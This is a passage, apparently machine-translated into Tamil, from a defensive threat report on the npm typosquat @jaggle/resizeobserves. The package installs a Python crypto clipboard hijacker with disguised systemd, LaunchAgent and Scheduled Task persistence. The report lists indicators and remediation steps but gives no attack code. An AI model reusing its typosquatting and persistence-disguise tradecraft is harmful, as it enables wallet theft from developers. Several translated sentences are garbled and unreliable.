- README கருத்துத் திருட்டு. தொகுப்பின் README என்பது முறையானது @juggle/resize-observer README-ஐ ஒவ்வொரு பைட்டும் துல்லியமாக, உள்ளடக்கியவாறு இறக்குமதி குறிப்பிடும் எடுத்துக்காட்டுகள் @juggle/resize-observer அதுவே (வெளியீட்டுத் தொகுப்பு அல்ல). இயக்குபவர் இறக்குமதிகளை மீண்டும் எழுதக்கூட மெனக்கெடவில்லை — இது, readme ஆவணம் மாற்றியமைக்கப்படாமல், அப்படியே எடுக்கப்பட்டது என்பதற்கான ஒரு பொதுவான அறிகுறியாகும்.
- மாற்றி அமைப்பதற்கு எந்த உள்கட்டமைப்பும் இல்லை. C2 எண்ட்பாயிண்ட், DNS தேடல், IP முகவரி எதுவும் இல்லை. தீங்கிழைக்கும் செயல்பாடு, உள்ளூர் கிளிப்பர் மற்றும் நிரலில் நேரடியாகக் குறிப்பிடப்பட்ட வாலட் தொகுப்பு ஆகியவற்றில் முழுமையாக பொதிந்துள்ளது. இது டொமைன் அல்லது ASN அடிப்படையிலான பிவட்டிங்கைச் சாத்தியமற்றதாக்குகிறது. வெவ்வேறு கேம்பெயின்களில் பிவட் செய்யும் தடுப்பாளர்கள், தங்களிடம் உள்ள முந்தைய கிளிப்பர்களுடன் வாலட்களின் ஹாஷ்-மேட்ச் செய்ய வேண்டும்; வெவ்வேறு பேக்கேஜ்களில் ஒரு வாலட்டை மீண்டும் பயன்படுத்துவதே, கேம்பெயின்களுக்கு இடையேயான மிகவும் எளிமையான இணைப்பாகும்.
- பெயரிடும் தேர்வு. @jaggle/resizeobserves ஒரு எழுத்து மட்டும் வித்தியாசமாக உள்ளது @ஜக்ல் மற்றும் நன்கு அறியப்பட்டதிலிருந்து ஒரு மாறுபாடு மறுஅளவிடு-கவனிப்பான்ஒருங்கிணைந்த திருத்த இடைவெளி இரண்டு எழுத்துருக்கள் ஆகும். இது ஒரு திட்டமிட்ட காட்சி மோதலே தவிர, ஒரு பொதுவான குந்துகை அல்ல.
பேலோட் நடத்தையை அடிப்படையாகக் கொண்ட உந்துதல்: சந்தர்ப்பவாத கிளிப்போர்டு மாற்றீட்டின் மூலம் முழுமையான பணமாக்குதல். இதில் நற்சான்றிதழ் சேகரிப்பு இல்லை, ஹோஸ்ட் கைரேகை பதிவு இல்லை, சூழல் மாறிகளைப் படித்தல் இல்லை. பாதிக்கப்பட்டவர் யார் என்பது பற்றி இயக்குபவருக்குக் கவலையில்லை — பாதிக்கப்பட்டவரின் அடுத்த பரிமாற்றம் பட்டியலிடப்பட்ட முகவரிகளில் ஒன்றைச் சுட்டிக்காட்டுகிறதா என்பதில் மட்டுமே அவர் அக்கறை கொள்கிறார். நாற்பது-சங்கிலித் தொடர் பாதுகாப்பு என்பது நடைமுறையில் உள்ள லாட்டரி மாதிரி: பரவலாக வீசி, ஒவ்வொரு N நிறுவல்களுக்கும் ஒரு முறையாவது அதிக மதிப்புள்ள ஒரு பேஸ்ட் வந்து சேரும் என்று நம்புவது.
செயல்பாட்டாளர் நீக்குதல் குறித்து அக்கறையற்றவராகத் தெரிகிறார். ஒரே நோக்கத்தின் கீழ் இரண்டு மணி நேரத்திற்குள் ஒன்பது பதிப்புகளை வெளியிடுவது, 'வெளியிட்டு எரிக்கும்' ஒரு தந்திரமாகத் தெரிகிறது: நீக்குதல் தாமதம் ஏற்படுவதற்கு முன்பு பதிவகத்தின் அளவை அதிகப்படுத்தி, பின்னர் அடுத்த கட்டத்திற்குச் செல்வது. நாங்கள் கவனிக்கவில்லை. @ஜாகிள் இதை எழுதும் நேரத்தில் ஒரு புதிய நோக்கத்தின் கீழ் மீண்டும் வெளியிடப்படுகிறது, ஆனால் ஒத்த நோக்கங்களை நாங்கள் எதிர்பார்ப்போம் (@ஜாக்கி, @ஜகிள்-, @joggleஆபரேட்டர் இன்னும் செயலில் இருந்தால், வரும் நாட்களில் தோன்றும்.
தாக்கம், போக்குகள் மற்றும் தடுப்பாட்டக்காரர்கள் என்ன செய்ய வேண்டும்
தாக்கம்
தற்போதைய தரவுத்தொகுப்பிலிருந்து உண்மையான பண மதிப்பில் தாக்கத்தை அளவிடுவது சாத்தியமில்லை. கிளிப்பர் எந்த டெலிமெட்ரியையும் பதிவு செய்வதில்லை, மேலும் பகுப்பாய்வு நிறுத்தப்படும் வரை வாலெட்டுகள் பதிலீட்டுப் பரிமாற்றங்களைப் பெறுவது இன்னும் காணப்படவில்லை (பட்டியலிடப்பட்ட சங்கிலிகளின் தொடர் ஆய்வு எங்கள் பட்டியலில் உள்ளது). சட்டப்பூர்வமான npm:@juggle/resize-observer வாரந்தோறும் சராசரியாக ஏழு இலக்கங்களில் பதிவிறக்கம் செய்யப்படுகிறது — இது டைப்போஸ்க்வாட் தாக்குதல்களுக்கு அதிகப் போக்குவரத்து உள்ள ஒரு இலக்காகும் — மேலும், இந்தத் தீங்கிழைக்கும் மென்பொருள் தொகுப்பு, தகவல் வெளிப்படுத்தப்பட்ட நேரத்தில் 24 மணி நேரத்திற்கும் குறைவாகவே பயன்பாட்டில் இருந்தது. இது, தாக்குதலுக்கு உள்ளானவர்களின் எண்ணிக்கையைக் கட்டுப்படுத்துகிறதே தவிர, அதை முற்றிலுமாக நீக்கிவிடுவதில்லை.
கண்காணிக்க வேண்டிய வெடிப்பு ஆரம் என்பது நேரடி பதிவிறக்கங்கள் அல்ல @jaggle/resizeobserves — அவை பெரும்பாலும் சிறியவையாக இருக்கும். இது **கடந்து நிறுவப்படும் முறை**: அதாவது, ஒரு டெவலப்பர் ஒரு சாண்ட்பாக்ஸ் திட்டத்தில் தொகுப்பைச் சேர்த்து, அதை இயக்குவது. npm நிறுவுபின்னர், இன்ஸ்டால் ஹூக் இயங்கியதையே மறந்துவிடுவது. போஸ்ட்இன்ஸ்டாலைச் செயல்படுத்திய ஒவ்வொரு கணினியிலும், ப்ராஜெக்ட் இன்னும் டிஸ்க்கில் இருக்கிறதா இல்லையா என்பதைப் பொருட்படுத்தாமல், இப்போது ஆட்டோ-ஸ்டார்ட்டில் ஒவ்வொரு பயனருக்குமான கிளிப்போர்டு ஹைஜேக்கர் உள்ளது. பேக்கேஜ் டைரக்டரியை அகற்றுவது முனை_மாடூல்கள் அது நிலைத்தன்மையை நீக்குவதில்லை.
தோன்றும் வடிவங்கள்
இந்தப் பிரச்சாரம் இரண்டு போக்குகளுக்கு எடுத்துக்காட்டாக விளங்குகிறது.
பைத்தான் தரவுச்சுமையை வழங்குவதற்கான ஒரு உறையாக npm. npm tarball என்பது 4-வரி நிறுவி; ஆனால், உண்மையான திறவுகோல் பைதான் தான், அது கணினி முழுவதும் நிறுவப்படுகிறது. பிப் தொகுக்கப்பட்ட கோப்பகத்திலிருந்து. இது புதிதல்ல — npm தொகுப்புகள் பைத்தானை நீக்குவதை நாம் முன்பே பார்த்திருக்கிறோம் — ஆனால் இது கிரிப்டோ-கிளிப்பர் பிரச்சாரங்களில் கணிசமாகப் பொதுவான ஒரு வடிவமாக மாறி வருகிறது. இயக்குபவருக்கு இதில் இருவகையான நன்மை உண்டு: பைத்தான் கிளிப்போர்டு நூலகங்கள் (பைப்பர்கிளிப் அவற்றுள் முதன்மையானவை) ஜாவாஸ்கிரிப்ட் சமமானவற்றை விடத் தூய்மையானவை மற்றும் பல இயங்குதளங்களில் இயங்கக்கூடியவை, மேலும் பெரும்பாலான தானியங்கு npm ஸ்கேனர்கள் ஜாவாஸ்கிரிப்ட் கோப்புகளுக்கும் பைத்தானுக்கும் அதிக முக்கியத்துவம் அளிக்கின்றன. .py கட்டுகளை லேசாக. இதன் விளைவாக, நிறுவும் இடம் அதிக சத்தத்தை உண்டாக்கும் — ஒரு புதிய குழாய் நிறுவல் வழக்கமாக இல்லாத ஒரு டெவலப்பர் கணினியில் மறைப்பது கடினம். குழாய் நிறுவல் போது npm நிறுவு.
இயங்குதளத்திற்கே உரிய பெயர்கள் மட்டுமே ஒரே மறைபொருள். சமீபத்திய பல கிளிப்பர்களும் சிறிய தரவு திருடர்களும், முறையான தோற்றமுடைய நிலைத்தன்மை லேபிள்களுக்கு ஆதரவாக, குறியீடு-நிலை மறைப்பை முற்றிலுமாகக் கைவிட்டுள்ளனர். python3-dbus-helper, com.apple.python.runtime, மற்றும் பைரன்டைம்ப்ரோக்கர் இவை பாடப்புத்தக உதாரணங்கள் — நாற்பது பயனர் சேவைகளின் பட்டியலில் ஒரு பாதுகாப்பாளரின் பார்வை கடந்துசெல்லும் பெயர்கள். இது ஒரு மலிவான, நீடித்த மறைமுகச் செயல்பாட்டு முறையாகும்: நீக்குதல் என்பது ஒவ்வொரு தொகுப்பிற்கும் தனித்தனியாகச் செய்யப்படும், ஆனால் நிலைத்தன்மைக் கோப்புகள் நீக்குதலுக்குப் பிறகும் நீடிக்கும், மேலும் உண்மையான தோற்றமுடைய ஒரு தளக் கூறின் பெயரால் பெயரிடப்பட்ட ஒரு சேவையானது, ஒரு வெளிப்படையான தணிக்கையைத் தவிர வேறு எதனாலும் சுத்தப்படுத்தப்படாது.
தடுப்பாட்டக்காரர்கள் என்ன செய்ய வேண்டும்
- ~/.config/systemd/user/, ~/Library/LaunchAgents/, மற்றும் Get-ScheduledTask ஆகியவற்றைத் தணிக்கை செய்யவும். வெளியீடு டெவலப்பர் கணினிகளில் IOC-களில் பட்டியலிடப்பட்டுள்ள உள்ளீடுகளுக்கு இது பொருந்தும். npm தொகுப்பை நீக்குவது இவற்றை அப்படியே விட்டுவிடும்; இவற்றை கைமுறையாக நீக்க வேண்டும்.
- பட்டியலிடப்பட்ட வாலட் முகவரிகளுக்கு தொகுதிப் பரிமாற்றங்கள் முகவரி அனுமதிப் பட்டியல் கிடைக்கும் கார்ப்பரேட் கருவூலம் மற்றும் DeFi வாலட் எல்லைகளில்.
- ~/.config/clipboard-guardian/config.json கோப்பைத் தேடவும். டெவலப்பர்-இயந்திரத் தொகுப்பு முழுவதும் (மற்றும் இயங்குதள சமமானவை). எந்த தொகுப்பு பதிப்பு அதை வழங்கியிருந்தாலும், கோப்பின் இருப்பு என்பது அதிக நம்பகத்தன்மை வாய்ந்த தொற்று ஆகும்.
- node_modules/ இல் clipboard_guardian/guardian.py ஐத் தேடவும். நீக்கத்திற்கு முந்தையதாக இருக்கக்கூடிய பில்ட்-கேச் ஸ்னாப்ஷாட்களில். கோப்பின் md5, மதிப்பாய்வு செய்யப்பட்ட அனைத்து பதிப்புகளிலும் நிலையானதாக உள்ளது.
- பூட்டுக்கோப்பு-பின் @juggle/resize-observer (சட்டப்பூர்வமான தொகுப்பு) என்பதால், ஒரு எழுத்துத் தவறின் கீழ் எதிர்கால நிறுவல்களால் வேறு எதற்கும் தீர்வு காண முடியாது, குறிப்பாக லாக்ஃபைல் இல்லாத பணிப்பாய்வுகளில் இதுபோல. npx.
- npm postinstall-ஐப் பயன்படுத்தி pip install-ஐ செயல்படுத்துவதைக் கையாளவும். அதிக தீவிரம் உள்ள கட்டமைப்பில்-pipeline கொள்கை. ஒரு npm தொகுப்பை நிறுவும் நேரத்தில் pip தேவைப்படுவதற்கு முறையான காரணம் எதுவும் இல்லை — பைதான் கருவிகள் பைதான் கருவிகளையே விநியோகிக்கின்றன.
- pyperclip-ஐ இறக்குமதி செய்யும் python3-dbus-helper என்ற பெயருடைய செயல்முறைகளுக்காக, process_iter()-உடன் ஒப்பிடக்கூடிய கண்காணிப்புத் தரவைத் தேடவும். — மாறுவேடப் பொருத்தமின்மை (டி-பஸ் ஹெல்பர் ஒரு கிளிப்போர்டு லைப்ரரியை வைத்திருப்பது) தான் நம்மிடம் உள்ள மிகவும் தெளிவான நடத்தைக் காட்டியாகும்.
- பாதிக்கப்பட்ட கணினிகளிலிருந்து ஒட்டப்பட்ட வாலட் முகவரிகளை சுழற்சி முறையில் மாற்றவும். கிளிப்போர்டு ஹைஜேக்கர் என்பது, வாலட் பயனர் இடைமுகத்திற்கும் பேஸ்ட் இலக்குக்கும் இடையிலான பாதையை ஊடுருவுகிறது; பாதிக்கப்பட்டிருக்கும்போது நகலெடுக்கப்படும் முகவரிகள் யாருக்கும் தெரியாமல் மாற்றப்படலாம். பாதிப்பு ஏற்பட்டிருக்கும் நேரத்தில் அனுப்பப்படும் எதுவும், தவறான முகவரிக்கு அனுப்பப்பட்டிருக்கக்கூடும் எனக் கருதப்பட வேண்டும்.
இதிலிருந்து நாம் அறிவது: நீக்கத்திற்குப் பிறகும் நிலைத்தன்மை நிலைத்திருக்கும். பதிவகம் இறுதியில் அதை அகற்றிவிடும். @jaggle/resizeobserves ஒன்பது பதிப்புகள் அனைத்திலும், systemd யூனிட், LaunchAgent மற்றும் Scheduled Task ஆகியவை தங்களைத் தாங்களே நீக்கிக்கொள்ளாது.
குறிப்புகள்
- npm இல் @juggle/resize-observer — இந்த எழுத்துப்பிழைத் திருடன் போலியாகக் காட்டும் முறையான தொகுப்பு; பைட்டுக்கு பைட் செய்யப்படும் README கருத்துத் திருட்டிற்கு ஒரு அடிப்படையாகப் பயன்படுகிறது.
- @jaggle/resize பதிவக மெட்டாடேட்டாவைக் கவனிக்கிறது — தடயவியல் காலவரிசைப்படுத்தலுக்குப் பயன்படும் வகையில், ஒன்பது தீங்கிழைக்கும் பதிப்புகளுக்கான நேர முத்திரைகளை வெளியிடவும்.




